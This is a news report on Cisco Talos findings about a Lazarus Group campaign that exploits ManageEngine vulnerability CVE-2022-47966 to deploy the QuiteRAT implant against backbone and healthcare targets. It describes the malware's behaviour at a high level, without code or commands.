The North Korean state-sponsored actor Lazarus Group recently started a new campaign targeting internet backbone infrastructure and healthcare entities in Europe and the US, security researchers from Cisco Talos have found.
The researchers said that the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) in January 2023, only five days after it was disclosed.
This vulnerability is highly critical, with a CVSS score of 9.8/10 and a Kenna risk score of 100/100.
The threat actors used the exploit to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process, activating the implant on the infected server. This binary is a variant of their MagicRAT malware that Cisco Talos named QuiteRAT.
First discovered in February by WithSecure, QuiteRAT has stayed under the radar until now. Like MagicRAT, QuiteRAT is built from the Qt framework, a free, open source, and cross-platform framework designed for building applications, and includes capabilities such as arbitrary command execution.
Its file size, however, is much smaller at 4 to 5MB compared with 18MB.
“This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework,” reads the analysis, published on August 24, 2023.
Once the implant starts running, it sends out preliminary system information to its command and control (C&C) servers. Then, it waits for the C&C to respond with a command code or an actual Windows command to execute on the endpoint via a child cmd.exe process.
“While MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C&C server to achieve continued operation on the infected endpoint,” the researchers added.
This is the third documented campaign attributed to the Lazarus Group since the beginning of 2023, with the actor reusing the same infrastructure throughout these operations.
The exploited vulnerability, affecting multiple products of Zoho-owned ManageEngine, is now awaiting reanalysis.
The same day Cisco Talos’ analysis was published, the FBI warned cryptocurrency firms about a surge in blockchain activity linked to the theft of hundreds of millions in digital currency attributed to the Lazarus Group.